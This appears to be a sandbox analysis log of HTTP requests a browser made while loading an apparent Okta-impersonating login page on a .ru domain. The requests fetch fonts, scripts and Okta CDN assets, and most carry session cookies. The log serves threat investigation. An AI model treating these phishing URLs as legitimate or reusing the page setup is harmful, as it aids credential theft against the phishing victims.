              Source: global trafficHTTP traffic detected: GET /zc5KphanyLHbWPTNYHyljbFGkin5Zqr8FTLfw HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9CVVkrdDdyZVlibjI5Y1YyRTRqRXc9PSIsInZhbHVlIjoidzBKa0F4WjdFQ1llOUJ5Qm8zemQ3T3daR2tjYjVuemVRY0xBSU11OTh1U2d6VkZlUStWWmU2RVQ3ckFVSnNXMWxzQlcxVFk3QVV0MFd4SlJCaVFQeDU3a2o2UEdmTjJZRGNEcUkwQlNHaUQrY2Q4ZlUyTkVMVVl6UVpqdU9INE8iLCJtYWMiOiIwODU5Y2Q3Yjk4NGFiZjdmMTA5ZTgzNjJkMDE4M2VhMDQxZTk2OTI2ZDg0ZTJmNTliNGM5NWYzZTZmN2MwMDc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InpUc2lVKzBPbHpITGJBclBPQmg1elE9PSIsInZhbHVlIjoiWnBBTjJPT05xc1ArUGFBblhRZ210WHNlYm9INXFaUGExMTVuRi9CdzdJVlFMbHdzVEpQWlkrcHdoTG91SElkOHFYN2RxL1lOSDVlSngyYTVZbkthaElKVE1UVTI0dEJRNzM0WE9YbHd3NkxCa0lEcDBjdWdxaHpteENSbC9NbXgiLCJtYWMiOiJkNTdiOTU1ZDI5YTM2NzgxNzFiOWVkNmU5YjdmNWQ0NmRjMGY4Mzg1OWUxNGZmOTc0ZjhlOGY5Yjg4OTYyNDZiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /12z3Q4M8PabCFb8920 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xy0OjismZXisvhpqH54cd30 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T173845Z&X-Amz-Expires=300&X-Amz-Signature=af31394ba4881913f262d030e5695fd0aa8434877ca5e77c597ea9c2bd2f1dbf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveOrigin: https://ldaqmiesa.fictiougbo.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34jOiDrdG3K2xY9IFtzP1ghJM97cr2wJnwLVj89110 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klNmSZj35YUESegMa2KJQwG9kOMxhlMosJqr6yggUDmkVVSKSRLtLLeAOFHaxiYTV1ab225 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
